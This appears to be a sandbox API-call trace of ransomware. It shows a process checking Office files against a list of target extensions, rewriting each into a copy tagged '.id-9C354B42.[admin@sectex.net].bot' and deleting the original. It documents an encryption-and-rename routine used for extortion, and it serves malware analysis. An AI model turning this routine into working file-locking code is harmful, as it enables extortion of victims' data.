	[0149.691] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.691] lstrlenW (lpString=".pdf") returned 4
	[0149.691] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.691] lstrlenW (lpString=".xls") returned 4
	[0149.691] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.691] lstrlenW (lpString=".xlsx") returned 5
	[0149.691] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.691] lstrlenW (lpString=".ppt") returned 4
	[0149.691] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.691] lstrlenW (lpString=".zip") returned 4
	[0149.691] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.691] lstrlenW (lpString=".rar") returned 4
	[0149.691] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.691] lstrlenW (lpString=".bz2") returned 4
	[0149.691] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.691] lstrlenW (lpString=".7z") returned 3
	[0149.691] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.691] lstrlenW (lpString=".dbf") returned 4
	[0149.692] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.692] lstrlenW (lpString=".1cd") returned 4
	[0149.692] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.692] lstrlenW (lpString=".jpg") returned 4
	[0149.692] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.692] lstrlenW (lpString=".doc") returned 4
	[0149.692] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.692] lstrlenW (lpString=".docx") returned 5
	[0149.692] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.692] lstrlenW (lpString=".pdf") returned 4
	[0149.692] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.692] lstrlenW (lpString=".xls") returned 4
	[0149.692] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.692] lstrlenW (lpString=".xlsx") returned 5
	[0149.692] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.692] lstrlenW (lpString=".ppt") returned 4
	[0149.692] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.692] lstrlenW (lpString=".zip") returned 4
	[0149.692] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.692] lstrlenW (lpString=".rar") returned 4
	[0149.692] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.692] lstrlenW (lpString=".bz2") returned 4
	[0149.692] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.692] lstrlenW (lpString=".7z") returned 3
	[0149.692] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.693] lstrlenW (lpString=".dbf") returned 4
	[0149.693] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.693] lstrlenW (lpString=".1cd") returned 4
	[0149.693] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.693] lstrlenW (lpString=".jpg") returned 4
	[0149.693] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.693] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.693] lstrlenW (lpString="OUTLOOK_F_COL.HXK") returned 17
	[0149.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.693] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=114) returned 1
	[0149.693] CloseHandle (hObject=0x384) returned 1
	[0149.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk")) returned 0x20
	[0149.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.694] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.694] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.695] GetLastError () returned 0x0
	[0149.695] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x72, lpOverlapped=0x0) returned 1
	[0149.698] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.699] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.699] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0149.699] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.699] CloseHandle (hObject=0x3ec) returned 1
	[0149.699] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.699] SetEndOfFile (hFile=0x384) returned 1
	[0149.701] CloseHandle (hObject=0x384) returned 1
	[0149.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk")) returned 1
	[0149.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.702] lstrlenW (lpString=".doc") returned 4
	[0149.702] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.703] lstrlenW (lpString=".docx") returned 5
	[0149.703] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.703] lstrlenW (lpString=".pdf") returned 4
	[0149.703] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.703] lstrlenW (lpString=".xls") returned 4
	[0149.703] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.703] lstrlenW (lpString=".xlsx") returned 5
	[0149.703] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.703] lstrlenW (lpString=".ppt") returned 4
	[0149.703] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.703] lstrlenW (lpString=".zip") returned 4
	[0149.703] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.703] lstrlenW (lpString=".rar") returned 4
	[0149.703] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.703] lstrlenW (lpString=".bz2") returned 4
	[0149.703] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.703] lstrlenW (lpString=".7z") returned 3
	[0149.703] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.703] lstrlenW (lpString=".dbf") returned 4
	[0149.703] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.703] lstrlenW (lpString=".1cd") returned 4
	[0149.703] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.703] lstrlenW (lpString=".jpg") returned 4
	[0149.703] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.703] lstrlenW (lpString=".doc") returned 4
	[0149.704] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.704] lstrlenW (lpString=".docx") returned 5
	[0149.704] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.704] lstrlenW (lpString=".pdf") returned 4
	[0149.704] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.704] lstrlenW (lpString=".xls") returned 4
	[0149.704] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.704] lstrlenW (lpString=".xlsx") returned 5
	[0149.704] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.704] lstrlenW (lpString=".ppt") returned 4
	[0149.704] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.704] lstrlenW (lpString=".zip") returned 4
	[0149.704] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.704] lstrlenW (lpString=".rar") returned 4
	[0149.704] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.704] lstrlenW (lpString=".bz2") returned 4
	[0149.704] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.704] lstrlenW (lpString=".7z") returned 3
	[0149.704] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.704] lstrlenW (lpString=".dbf") returned 4
	[0149.704] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.704] lstrlenW (lpString=".1cd") returned 4
	[0149.704] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 65
	[0149.704] lstrlenW (lpString=".jpg") returned 4
	[0149.704] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.705] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.705] lstrlenW (lpString="OUTLOOK_K_COL.HXK") returned 17
	[0149.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.705] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=113) returned 1
	[0149.705] CloseHandle (hObject=0x384) returned 1
	[0149.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk")) returned 0x20
	[0149.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.706] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.706] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.707] GetLastError () returned 0x0
	[0149.707] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x71, lpOverlapped=0x0) returned 1
	[0149.707] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.708] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.708] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0149.708] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.708] CloseHandle (hObject=0x3ec) returned 1
	[0149.709] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.709] SetEndOfFile (hFile=0x384) returned 1
	[0149.712] CloseHandle (hObject=0x384) returned 1
	[0149.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.713] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk")) returned 1
	[0149.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.714] lstrlenW (lpString=".doc") returned 4
	[0149.714] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.714] lstrlenW (lpString=".docx") returned 5
	[0149.714] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.715] lstrlenW (lpString=".pdf") returned 4
	[0149.715] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.715] lstrlenW (lpString=".xls") returned 4
	[0149.715] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.715] lstrlenW (lpString=".xlsx") returned 5
	[0149.715] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.715] lstrlenW (lpString=".ppt") returned 4
	[0149.715] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.715] lstrlenW (lpString=".zip") returned 4
	[0149.715] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.715] lstrlenW (lpString=".rar") returned 4
	[0149.715] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.715] lstrlenW (lpString=".bz2") returned 4
	[0149.715] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.715] lstrlenW (lpString=".7z") returned 3
	[0149.715] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.715] lstrlenW (lpString=".dbf") returned 4
	[0149.715] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.715] lstrlenW (lpString=".1cd") returned 4
	[0149.715] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.715] lstrlenW (lpString=".jpg") returned 4
	[0149.715] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.715] lstrlenW (lpString=".doc") returned 4
	[0149.715] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.715] lstrlenW (lpString=".docx") returned 5
	[0149.716] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.716] lstrlenW (lpString=".pdf") returned 4
	[0149.716] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.716] lstrlenW (lpString=".xls") returned 4
	[0149.716] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.716] lstrlenW (lpString=".xlsx") returned 5
	[0149.716] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.716] lstrlenW (lpString=".ppt") returned 4
	[0149.716] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.716] lstrlenW (lpString=".zip") returned 4
	[0149.716] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.716] lstrlenW (lpString=".rar") returned 4
	[0149.716] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.716] lstrlenW (lpString=".bz2") returned 4
	[0149.716] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.716] lstrlenW (lpString=".7z") returned 3
	[0149.716] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.716] lstrlenW (lpString=".dbf") returned 4
	[0149.716] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.716] lstrlenW (lpString=".1cd") returned 4
	[0149.716] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 65
	[0149.716] lstrlenW (lpString=".jpg") returned 4
	[0149.716] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.716] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0149.717] lstrlenW (lpString="OUTLWVW.DLL") returned 11
	[0149.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.717] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=128864) returned 1
	[0149.717] CloseHandle (hObject=0x384) returned 1
	[0149.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll")) returned 0x20
	[0149.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlwvw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.718] lstrlenW (lpString=".doc") returned 4
	[0149.718] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.718] lstrlenW (lpString=".docx") returned 5
	[0149.718] lstrcmpiW (lpString1=".docx", lpString2="W.DLL") returned -1
	[0149.718] lstrlenW (lpString=".pdf") returned 4
	[0149.718] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.718] lstrlenW (lpString=".xls") returned 4
	[0149.718] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.718] lstrlenW (lpString=".xlsx") returned 5
	[0149.718] lstrcmpiW (lpString1=".xlsx", lpString2="W.DLL") returned -1
	[0149.718] lstrlenW (lpString=".ppt") returned 4
	[0149.718] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.718] lstrlenW (lpString=".zip") returned 4
	[0149.718] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.718] lstrlenW (lpString=".rar") returned 4
	[0149.718] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.718] lstrlenW (lpString=".bz2") returned 4
	[0149.718] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.718] lstrlenW (lpString=".7z") returned 3
	[0149.718] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.718] lstrlenW (lpString=".dbf") returned 4
	[0149.718] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.718] lstrlenW (lpString=".1cd") returned 4
	[0149.718] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.718] lstrlenW (lpString=".jpg") returned 4
	[0149.718] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.719] lstrlenW (lpString=".doc") returned 4
	[0149.719] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.719] lstrlenW (lpString=".docx") returned 5
	[0149.719] lstrcmpiW (lpString1=".docx", lpString2="W.DLL") returned -1
	[0149.719] lstrlenW (lpString=".pdf") returned 4
	[0149.719] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.719] lstrlenW (lpString=".xls") returned 4
	[0149.719] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.719] lstrlenW (lpString=".xlsx") returned 5
	[0149.719] lstrcmpiW (lpString1=".xlsx", lpString2="W.DLL") returned -1
	[0149.719] lstrlenW (lpString=".ppt") returned 4
	[0149.719] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLWVW.DLL") returned 59
	[0149.719] lstrlenW (lpString=".zip") returned 4
	[0149.719] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
